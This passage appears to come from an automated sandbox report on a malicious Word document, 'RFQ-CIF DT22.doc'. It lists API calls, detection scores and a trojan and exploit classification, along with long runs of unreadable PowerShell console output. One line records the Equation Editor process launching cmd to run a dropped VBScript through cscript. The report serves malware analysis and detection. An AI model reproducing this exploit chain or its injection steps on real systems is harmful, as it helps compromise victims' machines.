Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FFFC NtCreateProcessEx,
Source: C:\Windows\SysWOW64\calc.exe	Code function: 11_2_00B3FF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D00C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D07AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFAB8 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFB50 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CF900 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CF9F0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D0060 NtQuerySection,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D0078 NtResumeThread,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D0048 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D10D0 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D010C NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D1148 NtOpenThread,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D01D4 NtSetValueKey,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFA20 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFA50 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFBE8 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CF8CC NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CF938 NtWriteFile,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D1930 NtSetContextThread,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFEA0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFFFC NtCreateProcessEx,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFC30 NtOpenProcess,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFC48 NtSetInformationFile,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D0C40 NtGetContextThread,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022CFD5C NtEnumerateKey,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_022D1D80 NtSuspendThread,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008A360 NtCreateFile,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008A410 NtReadFile,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008A490 NtClose,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008A540 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008A35A NtReadFile,
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 13_2_0008A48A NtClose,

Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr

OLE indicator has summary info: false

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$Q-CIF DT22.doc

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@12/12@5/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\cscript.exe

Code function: 13_2_00B82CB9 FormatMessageW,SysAllocString,LocalFree,LocalFree,GetLastError,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,FormatMessageA,MultiByteToWideChar,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,LocalFree,

Source: C:\Windows\SysWOW64\cscript.exe

Code function: 13_2_00B93F69 LoadResource,

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C

Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: RFQ-CIF DT22.doc	Virustotal: Detection: 25%
Source: RFQ-CIF DT22.doc	ReversingLabs: Detection: 15%

Source: C:\Windows\SysWOW64\cscript.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\SysWOW64\cscript.exe	Console Write: .................................3].....(.P.....l.......8...............b.........................................................$.......$.....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................#...............................................`I.........v.....................K..............j.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............Y..k......9.............................}..v....`.9.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0.2.............}..v....p.9.....0.......................$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../...............Y..k....(.9.............................}..v......9.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;..................k.... ...............................}..v....p.9.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............Y..k....(.9.............................}..v......9.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G..................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S..................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._..................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k..................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w..................k.... ...............................}..v....p!:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w...............Y..k....(":.............................}..v.....":.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p):.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(:.............................}..v.....:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p1:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(2:.............................}..v.....2:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p9:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(::.............................}..v.....::.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....pA:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(B:.............................}..v.....B:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....pI:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(J:.............................}..v.....J:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....pQ:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(R:.............................}..v.....R:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....pY:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(Z:.............................}..v.....Z:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....pa:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(b:.............................}..v.....b:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....pi:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(j:.............................}..v.....j:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....pq:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(r:.............................}..v.....r:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....py:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(z:.............................}..v.....z:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+..................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+...............Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....7..................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....7...............Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....C..................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....C...............Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....O..................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....O...............Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....[..................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....[...............Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....g..................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....g...............Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s..................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s...............Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p!;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(";.............................}..v.....";.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p);.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(;.............................}..v.....;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p1;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(2;.............................}..v.....2;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p9;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(:;.............................}..v.....:;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'..................k.... ...............................}..v....pA;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............Y..k....(B;.............................}..v.....B;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3..................k.... ...............................}..v....pI;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3...............Y..k....(J;.............................}..v.....J;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?..................k.... ...............................}..v....pQ;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?...............Y..k....(R;.............................}..v.....R;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K..................k.... ...............................}..v....pY;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K...............Y..k....(Z;.............................}..v.....Z;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W..................k.... ...............................}..v....pa;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W...............Y..k....(b;.............................}..v.....b;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c..................k.... ...............................}..v....pi;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c...............Y..k....(j;.............................}..v.....j;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o..................k.... ...............................}..v....pq;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o...............Y..k....(r;.............................}..v.....r;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....{..................k.... ...............................}..v....py;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....{...............Y..k....(z;.............................}..v.....z;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v......;.....0.......................r.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k......;.............................}..v....0.;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v......;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k......;.............................}..v....0.;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .E.x.c.e.p.t.i.o.n.........................}..v......;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k......;.............................}..v......;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v....(.;.....0.......................`.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k......;.............................}..v....`.;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ ..........k.... ...............................}..v......;.....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k......;.............................}..v....(.;.....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v.....o......0.......................j.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....xp..............................}..v.....p......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.9.5.............}..v.....u......0.......................$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............Y..k.....u..............................}..v....@v......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3..................k.... ...............................}..v.....}......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3...............Y..k.....}..............................}..v....@~......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?..................k.... ...............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?...............Y..k....................................}..v....@.......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K..................k.... ...............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K...............Y..k....................................}..v....@.......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W..................k.... ...............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W...............Y..k....................................}..v....@.......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c..................k.... ...............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c...............Y..k....................................}..v....@.......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o..................k.... ...............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o...............Y..k....................................}..v....@.......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....{..................k.... ...............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....{...............Y..k....................................}..v....@.......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k....................................}..v....@.......0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w.......................k.... ...............................}..v...... .....0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................Y..k...... .............................}..v....@. .....0...............x...............................
